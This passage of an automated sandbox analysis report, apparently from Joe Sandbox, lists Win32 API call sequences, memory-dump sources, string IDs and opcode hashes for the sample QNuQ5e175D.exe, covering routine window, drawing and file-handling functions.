                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                          • Instruction ID: 26e9208e2aa2ebd90a7e98889f3239c7d6ed4a815a584e9a2b1206afb1357c73
                                                          • Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                          • Instruction Fuzzy Hash: D1F08C71A04105AAD700EBE4EE499AEB378EF14324F20017BE112F31E5D7B89E509B2E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                          • Instruction ID: 02047a1f5ab1e1ae91636e32b2ea393de8a2dfbdc7c3bc720fead707395ef2b6
                                                          • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                          • Instruction Fuzzy Hash: 74E19A71A0470ADFCB24CF58C890BAABBF5FF44305F15852EE496A72D1E738AA51CB05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                          • Instruction ID: 0a97e2f3c77d8a3c51360fc4da6bbcda8fc4cde0dfaec3b210e24d05d93e5961
                                                          • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                          • Instruction Fuzzy Hash: 46C14872E042198BCF18DF68C4905EEB7B2BF88354F25866AD856B7380D734A942CF95
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F7B
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404F86
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FD0
                                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FE7
                                                          • SetWindowLongW.USER32(?,000000FC,00405570), ref: 00405000
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00405014
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405026
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 0040503C
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405048
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040505A
                                                          • DeleteObject.GDI32(00000000), ref: 0040505D
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405088
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405094
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040512F
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040515F
                                                            • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405173
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004051A1
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004051AF
                                                          • ShowWindow.USER32(?,00000005), ref: 004051BF
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 004052BA
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040531F
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405334
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405358
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405378
                                                          • ImageList_Destroy.COMCTL32(?), ref: 0040538D
                                                          • GlobalFree.KERNEL32(?), ref: 0040539D
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004054BF
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054CE
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054F9
                                                          • ShowWindow.USER32(?,00000000), ref: 00405547
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405552
                                                          • ShowWindow.USER32(00000000), ref: 00405559
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                          • Instruction ID: 2b71226c2ce540754c325362a134889399d6c5c4637dca841463e5b600fa6882
                                                          • Opcode Fuzzy Hash: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                          • Instruction Fuzzy Hash: 8802AD70900608AFDF20DFA8DD85AAF7BB5FB45314F10817AE611BA2E1D7798A41CF58
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404753
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404767
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404784
                                                          • GetSysColor.USER32(?), ref: 00404795
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004047A3
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004047B1
                                                          • lstrlenW.KERNEL32(?), ref: 004047B6
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047C3
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047D8
                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404831
                                                          • SendMessageW.USER32(00000000), ref: 00404838
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404863
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004048A6
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004048B4
                                                          • SetCursor.USER32(00000000), ref: 004048B7
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004048D0
                                                          • SetCursor.USER32(00000000), ref: 004048D3
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404902
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404914
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: ,F@$<c$Call$N
                                                          • API String ID: 3103080414-4250413633
                                                          • Opcode ID: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                          • Instruction ID: ccb0ec9a7d9d767aff215416cd1a2e620de701fb5c4a8d8609e67ea5798c0c5e
                                                          • Opcode Fuzzy Hash: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                          • Instruction Fuzzy Hash: 046192F1900209BFDB10AF64DD85EAA7B69FB84315F00853AFB05B65E0C778A951CF98
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                          • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                          • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                          • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406358,?,?), ref: 004061F8
                                                          • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 00406201
                                                            • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                            • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                          • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 0040621E
                                                          • wsprintfA.USER32 ref: 0040623C
                                                          • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406277
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406286
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004062BE
                                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406314
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406325
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040632C
                                                            • Part of subcall function 00406067: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                            • Part of subcall function 00406067: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                          • Instruction ID: 21ba76f912769f78f8e3df01d85e3e27af82f360ac84a16f7af8f01611abcd2b
                                                          • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                          • Instruction Fuzzy Hash: 66314330240325BBD2206B659D48F6B3B6CDF45708F16043EFD42B62C2DA3C982486BD
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\QNuQ5e175D.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                          • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406826
                                                          • *?|<>/":, xrefs: 00406877
                                                          • "C:\Users\user\Desktop\QNuQ5e175D.exe", xrefs: 00406869
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-1861573198
                                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction ID: bedb2e6347f460b6a244a356934bd0223db9426f0f89d28790e15ec7ef568a4f
                                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction Fuzzy Hash: C911B66780221295DB303B148C40A7762A8AF59754F56C43FED86732C0E77C5C9282AD
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040457A
                                                          • GetSysColor.USER32(00000000), ref: 004045B8
                                                          • SetTextColor.GDI32(?,00000000), ref: 004045C4
                                                          • SetBkMode.GDI32(?,?), ref: 004045D0
                                                          • GetSysColor.USER32(?), ref: 004045E3
                                                          • SetBkColor.GDI32(?,?), ref: 004045F3
                                                          • DeleteObject.GDI32(?), ref: 0040460D
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404617
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction ID: 3bf72a8e0ffa46ee4049c610ab3cabbd6d50cfb344f29d4a8179c655b9565abb
                                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction Fuzzy Hash: 5C2165B1500B04ABC7319F38DE08B577BF4AF41715F04892EEA96A26E0D739D944CB54
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC425C2
                                                            • Part of subcall function 6FC412CC: lstrcpynW.KERNEL32(00000000,?,6FC4137F,00000019,6FC411CA,-000000A0), ref: 6FC412DC
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 6FC42548
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FC42563
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                           • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID: @Hmu
                                                          • API String ID: 4216380887-887474944
                                                          • Opcode ID: 60df8de7b5a988bccddf30cb19f0aed2b8abe1b2bc6946f7de17350774018c82
                                                          • Instruction ID: e2b1e7e4d579973d6c1d5c0edb8a0d48e304033036589873bc5ad28fd9346db5
                                                          • Opcode Fuzzy Hash: 60df8de7b5a988bccddf30cb19f0aed2b8abe1b2bc6946f7de17350774018c82
                                                          • Instruction Fuzzy Hash: 8E4126B0408706DFD724EF39E861AA677F8FB85324F108A1EEA56C7181F730A558CB61
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404ECC
                                                          • GetMessagePos.USER32 ref: 00404ED4
                                                          • ScreenToClient.USER32(?,?), ref: 00404EEE
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404F00
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F26
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction ID: fe1e2a7802b6c51c8f018a14413b1ee553013da7dc16083b389f375565560bf3
                                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction Fuzzy Hash: 20015E71900219BADB00DB94DD85BFEBBBCAF95711F10412BBB51B61D0C7B4AA418BA4
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E76
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                          • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401EF8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
